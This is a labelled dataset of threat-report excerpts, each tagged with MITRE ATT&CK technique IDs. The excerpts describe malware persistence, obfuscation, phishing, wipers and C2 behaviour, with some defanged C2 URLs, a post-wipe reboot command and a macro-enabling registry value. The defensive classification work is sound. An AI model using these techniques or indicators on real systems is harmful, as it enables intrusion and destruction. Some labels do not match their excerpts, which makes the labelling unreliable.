{"text1":"To gain access to victim environments, the threat actor began by targeting handpicked employees using LinkedIn messaging and email, advertising fake jobs to lure recipients into checking into the supposed offers. In one case, we uncovered evidence indicating that the attacker had established communication with a victim via email and convinced them to click on a Google Drive URL purporting to contain an attractive job advert. Once clicked, the URL displayed the message, \u201cOnline preview is not available,\u201d then presented a second URL leading to a compromised or rogue domain, where the victim could download the payload under the guise of a job description","labels":"['T1566.003']"}
{"text1":"TajMahal\u2019 is a previously unknown and technically sophisticated APT framework discovered by Kaspersky Lab in the autumn of 2018. We discovered up to 80 malicious modules stored in its encrypted Virtual File System, one of the highest numbers of plugins we\u2019ve ever seen for an APT toolset","labels":"['T1027']"}
{"text1":"When loaded, the FoggyWeb backdoor (originally named Microsoft.IdentityServer.WebExtension.dll by its developer) functions as a passive and persistent backdoor that allows abuse of the Security Assertion Markup Language (SAML) token. The backdoor configures HTTP listeners for actor-defined URIs that mimic the structure of the legitimate URIs used by the target\u2019s AD FS deployment. The custom listeners passively monitor all incoming HTTP GET and POST requests sent to the AD FS server from the intranet\/internet and intercept HTTP requests that match the custom URI patterns defined by the actor. This version of FoggyWeb configures listeners for the following hardcoded URI patterns (which might vary per target","labels":"['T1550', 'T1040']"}
{"text1":"After completing this wiping functionality, the sample will reboot the system using the following command line, which will render it unusable when the system reboots as the important system locations and files have been overwritten with random data","labels":"['T1529']"}
{"text1":"Typical lateral movement methods were employed, using Windows commands. First, a network connection with a remote host was established using the command \u201cnet use","labels":"['T1049']"}
{"text1":"1) Loads the image resource with name `T__6541957882` into memory. 3) Adds `0xEE` to the bytes to decode the DLL. 4) Reflectively loads decoded DLL into memory and executes it","labels":"['T1620']"}
{"text1":"Kimsuky has also used a Mac OS Python implant that gathers data from Mac OS systems and sends it to a C2 server (Command and Scripting Interpreter: Python [T1059.006]). The Python program downloads various implants based on C2 options specified after the filedown.php (see figure 4","labels":"['T1071.003', 'T1059.006']"}
{"text1":"PowerShell: Microsoft scripting tool that was used to run commands to download payloads, traverse compromised networks, and carry out reconnaissance","labels":"['T1059.001']"}
{"text1":"Daserf \u2014 This backdoor has the functionality of a remote shell and can be used to execute commands, upload and download data, capture screenshots, and log keystrokes. It uses RC4 encryption and custom Base64 encoding to obfuscate HTTP traffic. As of this publication, BRONZE BUTLER demonstrates a preference for concurrently using Datper and xxmm in its operations. MSGet typically downloads encoded binaries from hard-coded URLs. Source: Secureworks) - Screen Capture Tool\u2014 This tool can capture the desktop of a victim's system (see Figure 5). Figure 5. Source: Secureworks) - RarStar \u2014 This custom tool uploads RAR archives to a specified URL as POST data (see Figure 6). RarStar encodes the POST data using Base64 and a custom XOR algorithm. T-SMB Scan \u2014 This SMB scanning tool was originally published on a Chinese program-sharing website (pudn.com). BRONZE BUTLER removed its help message functionality. WinRAR \u2014 This tool extracts tools for lateral movement and compresses data for exfiltration. Use malware to upload the large list of enumerated files to the C2 server. Search proxy log files for evidence of web server scanning using the URL patterns associated with BRONZE BUTLER activity","labels":"['T1132.001']"}
{"text1":"1) Right after midnight, the attackers connected to a machine on the targeted network most probably via RDP. 3) The attacker used psexec.exe to execute \u201cCobalt.Client.exe\u201d, which is the Pay2Key ransomware itself, on different machines within the organization","labels":"['T1090', 'T1090.001']"}
{"text1":"If the system is a 64-bit version of Windows, it downloads and executes a specific 64-bit version of the malware thanks to a powershell script","labels":"['T1059.001']"}
{"text1":"Remote templates are a feature of Microsoft Word which allow a document to load a template to be used in a document \u2013 this template can be externally hosted, either on a file share, or on the internet. The template is then loaded when the document is opened. The Inception attackers use this feature in a malicious context as shown in Figure 1 below","labels":"['T1221']"}
{"text1":"Collect document files with the suffixes \".txt\", \".doc\" and \".xls\" in the Internet cache directory of the IE browser","labels":"['T1005']"}
{"text1":"If the user does not have permissions to add a service, the installation routine attempts to add persistence by creating the following registry key that will run the functional code within Emissary via an exported function named \"DllRegister","labels":"['T1547.001']"}
{"text1":"Malicious obfuscated VBA code is executed when the macro is first enabled. In some cases, the malicious macro is also executed when the user activates a fake text box","labels":"['T1204.002']"}
{"text1":"This group uses spear-phishing emails to deliver both malicious Word and PDF documents, and attempts to social engineer the victim into an infection rather than trying to exploit a software vulnerability","labels":"['T1566.001']"}
{"text1":"The APT actor has been observed using Cisco AnyConnect Secure Socket Layer (SSL) virtual private network (VPN) connections to enable remote logins on at least one victim network, possibly enabled by an Exim Simple Mail Transfer Protocol (SMTP) vulnerability (CVE 2019-10149) (External Remote Services [T1133]). More recently, the APT actor enumerated and exploited a Fortinet VPN vulnerability (CVE-2018-13379) for Initial Access [TA0001] and a Windows Netlogon vulnerability (CVE-2020-1472) to obtain access to Windows Active Directory (AD) servers for Privilege Escalation [TA0004] within the network (Valid Accounts [T1078]). These vulnerabilities can also be leveraged to compromise other devices on the network (Lateral Movement [TA0008]) and to maintain Persistence [TA0003","labels":"['T1133', 'T1210']"}
{"text1":"UnionCryptoUpdater.exe does not immediately download the stage 2 malware but instead downloads it after a time specified by the C2 server. This delay could be implemented to prevent researchers from directly obtaining the stage 2 malware","labels":"['T1497.003']"}
{"text1":"It registers as a system service to ensure its automatic execution at every system startup by adding the following registry keys","labels":"['T1547.001']"}
{"text1":"After an initial dormant period of up to two weeks, it retrieves and executes commands, called \u201cJobs\u201d, that include the ability to transfer files, execute files, profile the system, reboot the machine, and disable system services","labels":"['T1497.003']"}
{"text1":"Once the malware starts it tries to reach a hardcoded C2. The communication takes place using the unmodified HTTP-based protocol, the request and response body are RC4-encrypted, and the encryption key is also hardcoded into the sample","labels":"['T1573.001']"}
{"text1":"From October 2012 to May 2014, FireEye observed APT12 utilizing RIPTIDE, a proxy-aware backdoor that communicates via HTTP to a hard-coded command and control (C2) server. RIPTIDE\u2019s first communication with its C2 server fetches an encryption key, and the RC4 encryption key is used to encrypt all further communication","labels":"['T1573.001']"}
{"text1":"Persistence was established via a crontab entry for a non-root user. With the binary named to masquerade as a legitimate file on the system and placed in a hidden directory, a crontab entry was created with a @reboot line so the GoldMax binary would execute again upon system reboot. Additionally, the threat actor used the nohup command to ignore any hangup signals, and the process will continue to run even if the terminal session was terminated","labels":"['T1053.003']"}
{"text1":"In analyzing FinFisher, the first obfuscation problem that requires a solution is the removal of junk instructions and \u201cspaghetti code\u201d, which is a technique that aims to confuse disassembly programs. Spaghetti code makes the program flow hard to read by adding continuous code jumps, hence the name. An example of FinFisher\u2019s spaghetti code is shown below","labels":"['T1027.001', 'T1027']"}
{"text1":"In April 2018 we discovered a new Octopus sample pretending to be Telegram Messenger with a Russian interface. We couldn\u00b4t find any legitimate software that this malware appears to be impersonating; in fact, we don\u00b4t believe it exists. Kaspersky Lab products detect the Octopus Trojan as Trojan.Win32.Octopus.gen","labels":"['T1036']"}
{"text1":"Later, the malware enters in a big block of trash code that also includes some elements to decrypt strings and important information for later","labels":"['T1027']"}
{"text1":"The DNS resolution is performed using DNS over HTTPS (DoH). The malware sends an HTTP POST request to a Google DNS Server (8.8.8.8) using the following headers","labels":"['T1572']"}
{"text1":"While Cobalt Gang 1.0 uses ThreadKit extensively, Cobalt 2.0 adds sophistication to its delivery method, borrowing some of the network infrastructures used by both APT28 (aka Fancy Bear) and MuddyWater. One of the Cobalt 2.0 Group\u2019s latest campaigns, an attack that leads to a Cobalt Strike beacon and to JavaScript backdoor, was investigated and presented by the Talos research team. Cobalt Group Technical Details . Stage 1 - Word Macro + Whitelisting Bypass . As with many other campaigns, the victim received a document with malicious macro visual basic code. In our case the attacker abused cmstp to execute JavaScript scriptlet (XML with JS) that is downloaded from the e-dropbox[.]biz site. Although some security solutions will block all PureBasic programs (wrong move \u2013 there are plenty of legitimate PureBasic programs in use today), it\u2019s a smart move made by the attacker group. The right side of the pair is the name of the JavaScript in the next stage (stage 4) , while the left side of the pair represents the file that will be downloaded as part of stage 5. Such a combination of registry manipulation was reported a year ago as part of an attack campaign executed by the Cobalt Group against Ukrainian banks. As part of the last execution step of the dll, the malicious code writes a JavaScript scriptlet into the Roaming directory and then it executes CreateProcess on the regsvr32 as described by the UserInitMprLogonScript. Stage 5 - JavaScript Backdoor . The last stage JavaScript is downloaded from hxxps:\/\/server.vestacp[.]kz\/robots.txt. Organizations should expect to see much more coming from all Cobalt Group factions during the next year","labels":"['T1105']"}
{"text1":"To confound detection, its operators recently started using PowerShell scripts that provide direct, in-memory loading and execution of malware executables and libraries. We will also present various payloads, including an RPC-based backdoor and a backdoor leveraging OneDrive as its Command and Control (C&C) server. Then, it calls VirtualProtect to allow writing at the retrieved address. Patching of AmsiScanBuffer function . Payloads . The PowerShell scripts we have presented are generic components used to load various payloads, such as an RPC Backdoor and a PowerShell backdoor. RPC backdoor . Turla has developed a whole set of backdoors relying on the RPC protocol. OneDrive credentials in PowerStallion script . It is interesting to note that Turla operators used the free email provider GMX again, as in the Outlook Backdoor and in LightNeuron. Then it uses a net use command to connect to the network drive. It then checks, in a loop, as shown in Figure 12, if a command is available. Modification of MAC times of the local log file . We believe this backdoor is a recovery access tool in case the main Turla backdoors, such as Carbon or Gazer, are cleaned and operators can no longer access the compromised computers. We have seen operators use this backdoor for the following purposes: Conclusion . In a 2018 blogpost, we predicted that Turla would use more and more generic tools","labels":"['T1106']"}
{"text1":"Gain access to the victim\u2019s network by logging into a public-facing system via Secure Shell (SSH) using a local account <user sftp> acquired during previous credential theft activities. Use port forwarding capabilities built into SSH on the public-facing system to establish a Remote Desktop Protocol (RDP) session to an internal server (Server 1) using a domain service account. From Server 1, establish another RDP session to a different internal server (Server 2) using a domain administrator\u2019s account","labels":"['T1021.001', 'T1090.001']"}
{"text1":"Following initial access, GRIM SPIDER focuses on collecting credentials from the compromised hosts and uses existing RDP in an attempt to get a domain administrator account and access to the Windows Domain Controller. This process can take several iterations of harvesting credentials, connecting to new systems and establishing persistence","labels":"['T1078']"}
{"text1":"All versions generate a list of files to encrypt by parsing the available drives and directories, but will avoid adding files that are of relevance to the malware","labels":"['T1083']"}
{"text1":"BOOM.exe, tracked by Microsoft as \u201cBoomBox\u201d, can be best described as a malicious downloader. The downloader is responsible for downloading and executing the next-stage components of the infection. These components are downloaded from Dropbox (using a hardcoded Dropbox Bearer\/Access token","labels":"['T1105', 'T1102']"}
{"text1":"There doesn\u2019t appear to be anything unique when it comes to the Word Document and its standard ploy of pushing recipients to \u201cenable content\u201d and run a malicious macro. An\u00a0analysis of the link from the phishing e-mail contains a base64-encoded string representing the recipient\u2019s address. Using that string, attackers insert the recipient\u2019s name into the filename of the World document","labels":"['T1140']"}
{"text1":"The downloader collects basic system information and sends it via an HTTP POST request to a hardcoded command and control (C&C) server (Figure 10","labels":"['T1071.001']"}
{"text1":"The C2 domain name for the DNS communication is hardcoded and obfuscated using XOR. The backdoor will generate a subdomain using a custom domain generation algorithm (DGA) and try to send an initial beacon to the C2 via DNS tunneling","labels":"['T1568.002']"}
{"text1":"However, the subsequent Diskcoder.C outbreak suggests that the attackers had access to the update server of the legitimate software. Using access to this server, attackers pushed a malicious update that was applied automatically without user interaction","labels":"['T1195.002']"}
{"text1":"The VPNpro trojanized application uses an AutoRun registry key, as mentioned in the publication released before July 2019. After that, it will check if ESET or BitDefender antivirus are installed before dropping the malware. If they are installed, nothing will be dropped. We'll now break down the 5kplayer trojanized installer","labels":"['T1518.001']"}
{"text1":"In the case of the observed exploit, specifically when handling Microsoft PowerPoint files, the packagers allows a Package OLE object to reference arbitrary external files, such as INF files, from untrusted sources. This will cause the referenced files to be downloaded in the case of INF files, to be executed with specific commands - An attacker can exploit this vulnerability to execute arbitrary code but will need a specifically crafted file and use social engineering methods (observed in this campaign) to convince a user to open it","labels":"['T1203']"}
{"text1":"The directory is used as temporary storage for files containing collected data about the compromised computer. Such files share a common naming convention, encryption algorithm and structure. They are encrypted by a simple variation of the XOR cipher which is used across the malware components. The type of the file can be derived from the 4-byte control sequences placed at the beginning of the file","labels":"['T1560.003']"}
{"text1":"The key descriptor\u2019s string contains Bayren_Munchen which seems likely to refer to the German soccer team FC Bayern Munich. Regardless, it is not the content of the key descriptor \u2013 but its length \u2013 that matters, with that length used to retrieve the XOR key used to encrypt the payload","labels":"['T1140']"}
{"text1":"The older \u201cmode\u201d variant of BitPaymer uses the Windows registry for persistence, while the newer service variant will attempt to install itself as a service","labels":"['T1543.003']"}
{"text1":"A while loop is used to join a series of data blobs into the allocated buffer, and the contents of this buffer are then decrypted with an XOR based algorithm. Once decrypted, the crypter jumps into the data blob which turns out to be a shellcode responsible for decrypting the actual payload. The shellcode copies the encrypted payload into another buffer allocated by calling the VirtualAlloc API, and then decrypts this with an XOR based algorithm in a similar way to that described above. To execute the payload, the shellcode replaces the crypter\u2019s code in memory with the code of the payload just decrypted, and jumps to its entry point","labels":"['T1140']"}
{"text1":"TA453, an\u00a0Iranian-state\u00a0aligned actor,\u00a0masqueraded as British scholars\u00a0to covertly target individuals of intelligence interest to the Iranian government in what Proofpoint has dubbed Operation\u00a0SpoofedScholars. The email conversations were benign until TA453 provided a link to a compromised website hosting a credential harvesting page. The use of a legitimate but actor-compromised website is an increase in sophistication compared to TA453\u2019s historical Tactics, Techniques, and Procedures of using actor-controlled credential phishing websites. Proofpoint has worked with the appropriate authorities to conduct victim notification","labels":"['T1584.001']"}
{"text1":"Gather the names of all services running on the system. Gather a list of the names of all processes running on the endpoint. Gather the list of all files names listed in the Recent Items folder i.e. Appdata%\\Microsoft\\Windows\\Recent\". - Gather all names of files listed in the Desktop folder of the current user. Gather names of all files and programs listed in the Taskbar i.e. The instrumentor script also enables all macros for Office by setting the VBAWarnings registry value to 0x1 at:\u00a0HKCU\\Software\\Microsoft\\Office\\<OfficeVersionNumber>.0\\Word\\Security\\VBAWarnings = 0x1","labels":"['T1057']"}
{"text1":"The code injected into an msiexec.exe sends a beacon signal to the CnC server and awaits commands","labels":"['T1218.007']"}
{"text1":"Run commands on Windows system remotely using Winexe: Winexe is a GNU\/Linux-based application that allows users to execute commands remotely on WindowsNT\/2000\/XP\/2003\/Vista\/7\/8 systems. It installs a service on the remote system, executes the command, and uninstalls the service. Winexe allows execution of most of the windows shell commands","labels":"['T1569.002']"}
{"text1":"As with campaigns attributed to BlackEnergy group the attackers used spearphishing emails with Microsoft Excel documents attached that contain malicious macros as an initial infection vector. This time malicious documents don\u2019t have any content with social engineering directing potential victims to click an Enable Content button. It seems that the attackers are depending on the victims to decide entirely on their own whether to click it or not","labels":"['T1204.002']"}
{"text1":"TEARDROP is a memory only dropper that runs as a service, spawns a thread and reads from the file \u201cgracious_truth.jpg\u201d, which likely has a fake JPG header. Next it checks that HKU\\SOFTWARE\\Microsoft\\CTF exists, decodes an embedded payload using a custom rolling XOR algorithm and manually loads into memory an embedded payload using a custom PE-like file format. TEARDROP does not have code overlap with any previously seen malware","labels":"['T1012']"}
{"text1":"Stage2.exe is a downloader for a malicious file corrupter malware. Upon execution, stage2.exe downloads the next-stage malware hosted on a Discord channel, with the download link hardcoded in the downloader. The next-stage malware can best be described as a malicious file corrupter. Once executed in memory, the corrupter locates files in certain directories on the system with one of the following hardcoded file extensions","labels":"['T1083']"}
{"text1":"Most of CARBANAK\u2019s strings are encrypted in order to make analysis more difficult. We have observed that the key and the cipher texts for all the encrypted strings are changed for each sample that we have encountered, even amongst samples with the same compile time","labels":"['T1027']"}
{"text1":"The Bazar backdoor is a new stealthy malware, part of the TrickBot group\u2019s toolkit arsenal and leveraged for high-value targets. The Bazar loader is used to download and execute the Bazar backdoor on the target system. The goal of this backdoor is to execute binaries, scripts, modules, kill processes, and then remove itself from the compromised machine. The samples used in this campaign heavily rely on\u00a0control flow obfuscation","labels":"['T1104']"}
{"text1":"To evade protections, Egregor create a Group Policy Object to disable Windows Defender and try to takedown any anti-virus console prior to ransomware execution","labels":"['T1562.001']"}
{"text1":"Adds persistence on the system by creating a shortcut in the user\u2019s Startup folder with the correct cmdline arguments","labels":"['T1547.001', 'T1547.009']"}
{"text1":"The malware contains 1 function, the purpose is to open the drive of the infected system (\\\\.\\PhysicalDrive0) and write the following data to the MBR: You can see the \"Are you Happy. After writing to the MBR, the malware reboots the machine with the following command: c:\\windows\\system32\\shutdown \/r \/t 1 After the reboot, the MBR displays the following string to the user: The link to the other campaigns was the following PDB path","labels":"['T1529']"}
{"text1":"The figure below shows the example of two of several possible command codes. Both create one thread, and each thread is responsible for either downloading and executing the file or running a command line program in the terminal","labels":"['T1105']"}
{"text1":"The macro finishes by running the dropped VBScript \"AppPool.vbs\" file by running \"wscript C:\\ProgramData\\WindowsAppPool\\AppPool.vbs\". When first executed, the \"AppPool.vbs\" file will create the following scheduled task to execute every minute, which provides BONDUPDATER persistence and the ability to continually run on the system as the Trojan does not have a main loop to carry out its functionality","labels":"['T1053.005']"}
{"text1":"Starting from August 2020, Pawn Storm has sent several spear phishing emails with a malicious RAR attachment. Among the earliest samples we received were two almost identical RAR files that contained a file called info.exe","labels":"['T1566.001']"}
{"text1":"At periodic offsets, the bootloader overwrites sectors of an infected host\u2019s entire hard drive, with a message similar to the ransom note, padded with additional bytes (Figure 2","labels":"['T1561.001']"}
{"text1":"Ryuk attempts to encrypt all mounted drives and hosts that have Address Resolution Protocol (ARP) entries (IP addresses) and it enumerates all mounted drives by calling GetLogicalDrives. For each mounted drive, Ryuk calls GetDriveTypeW to determine the drive\u2019s type. If the drive type is not a CD-ROM, files on the drive are encrypted. To retrieve IP addresses that have ARP entries, Ryuk calls GetIpNetTable. It iterates through all entries and then tries to enumerate files and folders on the remote host and encrypt the files","labels":"['T1083', 'T1082', 'T1016']"}
{"text1":"It\u2019s located on the hard drive and contains code that can display current volume shadow copy backups and all installed shadow copy writers and providers. Responsible for wiping deleted data from all drives using cipher.exe (cipher.exe is a built-in command-line tool in the Windows operating system that can be used to display or alter the encryption of directories and files on NTFS volumes. It\u2019s located on the hard drive and contains code that can display current volume shadow copy backups and all installed shadow copy writers and providers. 9) Responsible for wiping deleted data from all drives using cipher.exe (cipher.exe is a built-in command-line tool in the Windows operating system that can be used to display or alter the encryption of directories and files on NTFS volumes","labels":"['T1490']"}
{"text1":"After the Waterbear DLL loader is executed, it searches for a hardcoded path and tries to decrypt the corresponding payload, which is a piece of encrypted shellcode. The decryption algorithm is RC4, which takes the hardcoded path to form the decryption key. If the decrypted payload is valid, it picks a specific existing Windows Service \u2014 LanmanServer, which is run by svchost.exe \u2014 and injects the decrypted shellcode into the legitimate service. In most cases, the payload is a first-stage backdoor, and its main purpose is to retrieve second-stage payloads\u00a0\u2014 either by connecting to a C&C server or opening a port to wait for external connections and load incoming executables","labels":"['T1140']"}
{"text1":"Wiping all available methods of recovery shows this attacker had no intention of leaving the machine useable. The purpose of this malware is to perform destruction of the host, leave the computer system offline, and wipe remote data. Additionally, the destroyer disables all the services on the system: The malware uses the ChangeServiceConfigW API to change the start type to 4 which means: \"Disabled: Specifies that the service should not be started","labels":"['T1135']"}
{"text1":"This threat actor initially came to our attention in April 2018, leveraging both Western and Chinese Git repositories to deliver malware to honeypot systems vulnerable to an Apache Struts vulnerability","labels":"['T1190']"}
{"text1":"The email attachment is encrypted and stored in the compressed package, and a decryption password is provided in the mail body to bypass the security detection of the email gateway","labels":"['T1027']"}
{"text1":"Like any other typical PoS malware, Pillowmint iterates a list of processes and process them two at a time. it uses the API OpenProcess() using the\u00a0PROCESS_VM_READ and PROCESS_QUERY_INFORMATION flags to obtain a handle then reads the memory\u2019s content via ReadProcessMemory() API two chunks at a time. It then captures Track 1 and Track 2 credit card (CC) data. Depending on the Pillowmint version, it may encrypt the stolen CC data with AES encryption algorithm + Base64. Other versions may just encode the plain Credit Card Data it with Base64","labels":"['T1005', 'T1560']"}
{"text1":"Lastly, the attackers used Comodo code-signing certificates several times during the course of the campaign. Many of the above TTPs are not unique to ITG08, but collectively, and with the use of More_eggs, strengthen the link to this group","labels":"['T1047']"}
{"text1":"Other interesting keys include LSMinimumSystemVersion which indicates the (malicious) application is compatible with OSX 10.7 (Lion), and NSUIElement key which tells the OS to execute the application without a dock icon nor menu (i.e","labels":"['T1564.003']"}
{"text1":"The Gorgon Group Crew Breakdown Finding accessible directories, in combination with their other operational security failures, made it easy to start connecting the dots on Gorgon Group members. 360 and Tuisec already identified some Gorgon Group members. In addition to Subaat, we counted an additional four actors performing attacks as part of Gorgon Group. While it\u2019s not known if the attackers physically reside in Pakistan, all members of Gorgon Group purport to be in Pakistan based on their online personas. fudpages One member of Gorgon Group- we're calling \u2018fudpages\u2019, was found during this campaign activity based on their utilization of shared infrastructure. One specific Microsoft document drew our attention. 446e1c80102c8b9662d66d44525cb9f519369061b02446e0d4cd30cd26d79a25) This Microsoft Word document was sent via email to several industries across the US and Switzerland. We noticed that this document pulls down additional malware from a C2 also being used in attacks by other Gorgon Group members. Additionally, this document communicates to a relatively new piece of C2 infrastructure- umarguzardijye[.]com, which is hosted on 91[.]234[.]99[.]206","labels":"['T1566.001']"}
{"text1":"After installation, a keylogging routine begins. The malware writes keystrokes and window information to a filename in the present working directory with the following filename","labels":"['T1074.001']"}
{"text1":"A separate communication channel is created for each installed module. The communication protocol used is TLS over TCP. The communication is handled with the HP-Socket library. All the messages are RC4 encrypted using the hardcoded key. If the size of the message to be transferred is greater than or equal to 4KB, it is first compressed using zlib\u2019s Deflate implementation","labels":"['T1095']"}
{"text1":"This component achieves persistence through the Run registry key and has full backdoor capabilities: it can download and execute binaries, run arbitrary commands or upload files from the victim computer to the C&C server","labels":"['T1547.001']"}
{"text1":"The purpose of this malware is to perform destruction of the host, leave the computer system offline, and wipe remote data. Additionally, the destroyer disables all the services on the system: The malware uses the ChangeServiceConfigW API to change the start type to 4 which means: \"Disabled: Specifies that the service should not be started","labels":"['T1529']"}
{"text1":"Shathak or TA551 is the name some security researchers have given to a specific distribution method that uses password-protected ZIP archives as attachments to malspam. It has used Word document templates targeting English-, Italian-, German- and Japanese-speaking recipients. Shathak\/TA551 has been active at least as early as February 2019","labels":"['T1566.001']"}
{"text1":"MechaFlounder begins by entering a loop that will continuously attempt to communicate with its C2 server. The Trojan will use HTTP to send an outbound beacon to its C2 server that contains the user's account name and hostname in the URL. The code, seen in Figure 2, builds the URL by concatenating the username and hostname with two dashes \"--\" between the two strings. The code then creates the URL string by using the username and hostname string twice with the back-slash \"\\\" character between the two and by appending the string \"-sample.html","labels":"['T1041']"}
{"text1":"The malware scans for both open TCP ports 135 (RPC) and 1433(MSSQL) against the target, be it internal or external, and probes for the credential weakness in attempt to gain unauthorized access","labels":"['T1046']"}
{"text1":"Since FoggyWeb runs in the context of the main AD FS process, it inherits the AD FS service account permissions required to access the AD FS configuration database. This contrasts with tools such as ADFSDump that must be executed under the user context of the AD FS service account","labels":"['T1005']"}
{"text1":"If the scanning target is an IP address, Xbash will try to scan many TCP or UDP ports. Here are part of services they\u2019re probing and the ports used","labels":"['T1046']"}
{"text1":"Samples compiled in 2017 and 2018 were hard-coded with specific URI patterns to communicate with the C2 server via HTTP POST requests","labels":"['T1071.001']"}
{"text1":"Dedicated methods resolve additional strings and API calls at runtime, rendering the PE even more difficult to analyze. Below is an example of the method responsible for resolving the .bazar domains. It loads an obfuscated string, and deobfuscates it using the first character of the domain name as a XOR key for the rest of the string","labels":"['T1140']"}
{"text1":"SMOKEDHAM (127bf1d43313736c52172f8dc6513f56) is a .NET-based backdoor that supports commands, including screen capture and keystroke capture. The backdoor may also download and execute additional PowerShell commands from its command and control (C2) server","labels":"['T1059.001']"}
{"text1":"EvilBunny is a multi-threaded bot with an integrated scripting engine. It incorporates a Lua engine and downloads and executes Lua scripts to reach a certain level of polymorphism. The Lua scripts can call back into the C++ code to alter the malware behavior at runtime","labels":"['T1059.003']"}
{"text1":"Despite this indictment and other disclosures of COBALT DICKENS campaigns, the threat group (also known as Silent Librarian) shows no signs of stopping its activity as of this publication. CTU\u2122 researchers have observed the threat actors using free online services as part of their operations, including free certificates, domains, and publicly available tools","labels":"['T1608.005']"}
{"text1":"This function keeps receiving data from the system clipboard and then determines if it is a valid bitcoin wallet address. If yes, it overwrites the wallet address with the attacker\u2019s","labels":"['T1115', 'T1565.002']"}
{"text1":"After being extricated from the network, Dark Halo then returned a second time, exploiting a vulnerability in the organization's Microsoft Exchange Control Panel. Near the end of this incident, Volexity observed the threat actor using a novel technique to bypass Duo multi-factor authentication (MFA) to access the mailbox of a user via the organization's Outlook Web App (OWA) service. Finally, in a third incident, Dark Halo breached the organization by way of its SolarWinds Orion software in June and July 2020","labels":"['T1190']"}
{"text1":"Talos has uncovered documents that we assess with moderate confidence are associated with suspected persistent threat actor MuddyWater. MuddyWater has been active since at least November 2017 and has been known to primarily target entities in the Middle East. We assess with moderate confidence that these documents were sent to victims via phishing emails. One such trojanized document was created on April 23, 2019. The \"Blackwater.bas\" macro was obfuscated using a substitution cipher whereby the characters are replaced with their corresponding integer. Screenshot of the stager found in the document The stager then reached out to the actor-controlled C2 server located at hxxp:\/\/38[.]132[.]99[.]167\/crf.txt. The clear text version of the crf.txt file closely resembled the PowerShell agent that was previously used by the MuddyWater actors when they targeted Kurdish political groups and organizations in Turkey. rCecms=BlackWater\". Notably, the trojanized document's macro was also called \"BlackWater,\" and the value \"BlackWater\" was hard coded into the PowerShell script","labels":"['T1204.002']"}
{"text1":"If elevated privileges are not obtained, the malware falls back to using the same Windows registry run key as the older mode variant for persistence HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run. For each service, the malware attempts to take control of the service\u2019s executable \u2014 first using icacls.exe with the \/reset flag to reset the executable\u2019s permissions, then using takeown.exe with the \/F flag to take ownership of the executable","labels":"['T1222.001']"}
{"text1":"Microsoft discovered these new attacker tools and capabilities in some compromised customer networks and observed them to be in use from August to September 2020. Further analysis has revealed these may have been on compromised systems as early as June 2020","labels":"['T1047']"}
{"text1":"The script itself decodes and executes a large blob of base64-encoded text and converts it into a huge byte array","labels":"['T1140']"}
{"text1":"Ebury v1.4 has a fallback mechanism whereby a domain generation algorithm (DGA) is used when the attacker doesn\u2019t connect to the infected system via the OpenSSH backdoor for three days. Under these conditions, Ebury will exfiltrate the collected data using the generated domain. Ebury v1.6 has the same mechanism, but there is a minor change to the DGA itself","labels":"['T1568.002', 'T1008']"}
{"text1":"Figure 7: Dropbox-themed landing page with a lure asking users to click a button that links to the malicious document","labels":"['T1204.001']"}
{"text1":"Central Command network, including computers both in the headquarters and in the combat zones.The threat involved into this incident is referred as Agent.btz. There is even a clash with another threat that is also detected as Agent.btz by another vendor \u2013 but that's a totally different threat with different functionality. All these builds exhibit common functionality.Agent.btz is a DLL file. Once a removable disk is connected to a computer infected with Agent.btz, the active malware will detect a newly recognized drive. It will drop its copy on it and it will create autorun.inf file with an instruction to run that file. Agent.btz file is not packed. Thus, it\u2019s not known what kind of code could have been injected into the browser process. Agent.btz locates this resource by looking for a marker 0xAA45F6F9 in its memory map.File wmcache.nldThe second spawned thread will wait for 10 seconds. The collected network details are also saved into the log file.File winview.ocxThe second spawned thread will log threat activity into the file %system32%\\winview.ocx.This file is also encrypted with the same XOR mask. Note: an attempt to run a valid thumb.db file, which is an OLE-type container has no effect.Files thumb.dd and mssysmgr.ocxAgent.btz is capable to create a binary file thumb.dd on a newly connected drive","labels":"['T1560.003']"}
{"text1":"The cluster targeting Brazil used hacked websites and Google Ads to drive users to download the malicious installer. The campaign targeting other countries used spear-phishing as the delivery method","labels":"['T1189']"}
{"text1":"In cases where spam attachments could be verified \u2014 once a user has opened the attachment and enabled macro functionality \u2014 a PowerShell script downloads either Emotet, Bokbot or Trickbot, with the end payload being TrickBot","labels":"['T1566.001']"}
{"text1":"There are likely differences in the Skeleton Key malware documented by Dell SecureWorks and the Mimikatz skeleton key functionality. If all the DCs don\u2019t have skeleton key configured, the master password won\u2019t work when the client authenticates to a DC without skeleton key. Scenario: Either the attacker exploits MS14-068 or has the KRBTGT NTLM password hash and uses it to generate a Kerberos Golden Ticket to impersonate a valid Domain Admin account. Domain Controller Security Events When Implanting the Mimikatz Skeleton Key: When implanting the skeleton key remotely using Mimikatz the following events are logged on the Domain Controller. Authenticating with the Mimikatz Skeleton Key: Testing user password and user account with skeleton key password. Note that both passwords are accepted \u2013 the valid user password and the skeleton key master password. Testing Domain Admin account with password & skeleton key password. Note that both passwords are accepted \u2013 the valid user password and the skeleton key master password. Skeleton Key Mitigation: - Protect domain-level admin (DLA) accounts (Domain Admin, Administrators, etc) which reduces the risk of attackers gaining access to these credentials. Don\u2019t let DLA accounts logon to systems at a different security level from Domain Controllers","labels":"['T1098']"}
{"text1":"In the first case, attackers create two WMI event filters and two WMI event consumers. The consumers are simply command lines launching base64-encoded PowerShell commands that load a large PowerShell script stored in the Windows registry. Figure 1 shows how the persistence is established","labels":"['T1546.003']"}
{"text1":"The Updater.exe program has the same program icon as CelasTradePro.exe. When run, it checks for the CheckUpdate parameter, collects the victim\u2019s host information (System Owner\/User Discovery [T1033]), encrypts the collected information with a hardcoded XOR encryption, and sends information to a C2 website (Exfiltration Over C2 Channel [T1041","labels":"['T1082', 'T1041']"}
{"text1":"running software, system name, IP address) - install additional malware onto the system - check for the presence of 29 different antivirus tools","labels":"['T1518.001']"}
{"text1":"Poseidon utilizes a variety of tools. Their main infection tool has been steadily evolving since 2005, with code remnants remaining the same to this day, while others have been altered to fit the requirements of new operating systems and specific campaigns. This tool appears to be designed to operate on high-value corporate systems like Domain Controllers or IIS servers that act as repositories of valuable information, particularly for lateral movement. The Information Gathering Tool (IGT) tool is coded in Delphi and includes powershell and SQL components across a dozen different drops. This tool contains several other executable files made in different programming languages ranging from Visual Basic 6 to C#, each one performing a very clear task devised by the group when trying to obtain more information from an objective","labels":"['T1059.001']"}
